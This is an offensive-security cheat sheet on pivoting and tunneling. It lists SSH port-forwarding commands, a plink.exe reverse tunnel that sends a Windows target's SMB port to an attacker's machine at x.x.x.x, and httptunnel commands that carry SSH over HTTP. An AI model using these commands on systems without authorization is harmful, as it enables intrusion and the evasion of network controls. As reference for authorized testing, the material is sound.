Lateral movement
Pivoting / lateral movement / port forwarding / tunneling

Local port forwarding

Forward local port to remote host
1
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Copied!

Remote port forwarding

Forward remote port to local host
1
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Copied!
Windows: forward local Windows port 445 to 444 at our attacking machine. First start ssh at our attacking machine:
1
service ssh start
Copied!
Download plink.exe at target and execute (where x.x.x.x is our attacking machine):
1
plink.exe -l root x.x.x.x -R 444:127.0.0.1:445
Copied!

Dynamic port forwarding

The -D flag makes SSH acting as a SOCKS (4,5) proxy server, which simply is a SSH tunnel in which specific applications forward the traffic through the tunnel to the remote server. Unlike local port forwarding, dynamic port forwarding can handle connections from multiple ports.
1
ssh -D <local proxy port> -p <remote port> <target>
Copied!

Traffic encapsulation

SSH over HTTP

Using httptunnel
http will only with TCP services
At target: open port 80 and redirect incoming traffic from port 80 to port 22 (ssh service)
1
hts -F localhost:22 x.x.x.x:80
Copied!
Where x.x.x.x = LAN or public IP from attacker
At client: start a tunnel on a random local port 6969 which is bound at port 80:
1
htc.exe -F 6969 x.x.x.x:80
Copied!
At client: log in via SSH:
1
ssh -p 6969 localhost
Copied!
Last modified 2yr ago